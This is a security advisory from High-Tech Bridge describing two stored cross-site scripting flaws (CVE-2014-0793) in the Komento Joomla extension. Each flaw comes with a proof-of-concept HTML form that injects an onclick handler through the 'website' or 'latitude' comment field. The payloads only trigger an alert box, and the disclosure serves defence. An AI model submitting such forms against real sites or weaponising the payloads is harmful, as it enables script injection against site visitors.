Cross-Site Scripting (XSS) in Komento Joomla Extension

2014-01-02T00:00:00
ID HTB23194
Type htbridge
Reporter High-Tech Bridge
Modified 2014-01-21T00:00:00

Description

High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Komento Joomla Extension, which can be exploited to perform script insertion attacks.

1) Cross-Site Scripting (XSS) in Komento Joomla Extension: CVE-2014-0793
1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "website" HTTP POST parameter to "/?option=com_komento" URL. A remote attacker can submit a comment with specially crafted "Website" field and execute arbitrary HTML and script code in browser in context of the vulnerable website when a user clicks on the nickname of the malicious author.
The following exploitation example uses the "alert()" JavaScript function to display word "immuniweb" when user clicks on the attacker's nickname in comment:
<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl" value="component">
<input type="hidden" name="format" value="ajax"> <input type="hidden" name="no_html" value="1"> <input type="hidden" name="component" value="com_content"> <input type="hidden" name="cid" value="24"> <input type="hidden" name="comment" value="comment"> <input type="hidden" name="parent_id" value="0"> <input type="hidden" name="name" value="name"> <input type="hidden" name="email" value="email@email.com"> <input type="hidden" name="website" value='http://www.htbridge.com"
onclick="javascript:alert(/immuniweb/);"'>
<input type="hidden" name="subscribe" value="false"> <input type="hidden" name="latitude" value=''>
<input type="hidden" name="longitude" value="1"> <input type="hidden" name="address" value="1"> <input type="hidden" name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId" value="435"> <input type="hidden" name="option" value="com_komento"> <input type="hidden" name="namespace" value="site.views.komento.addcomment">
<input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> </form>
1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "latitude" HTTP POST parameter to "/?option=com_komento" URL. A remote attacker can submit a comment with specially crafted "latitude" field and execute arbitrary HTML and script code in browser in context of the vulnerable website when a user clicks on the address of the malicious author.
The following exploitation example uses the "alert()" JavaScript function to display word "immuniweb" when user clicks on the attacker's address in comment:
<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl" value="component">
<input type="hidden" name="format" value="ajax"> <input type="hidden" name="no_html" value="1"> <input type="hidden" name="component" value="com_content"> <input type="hidden" name="cid" value="24"> <input type="hidden" name="comment" value="comment"> <input type="hidden" name="parent_id" value="0"> <input type="hidden" name="name" value="name"> <input type="hidden" name="email" value="email@email.com"> <input type="hidden" name="website" value='www.htbridge.com'>
<input type="hidden" name="subscribe" value="false"> <input type="hidden" name="latitude" value='"
onclick="javascript:alert(/imuniweb/);">'>
<input type="hidden" name="longitude" value="1"> <input type="hidden" name="address" value="1"> <input type="hidden" name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId" value="435"> <input type="hidden" name="option" value="com_komento"> <input type="hidden" name="namespace" value="site.views.komento.addcomment">
<input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> </form>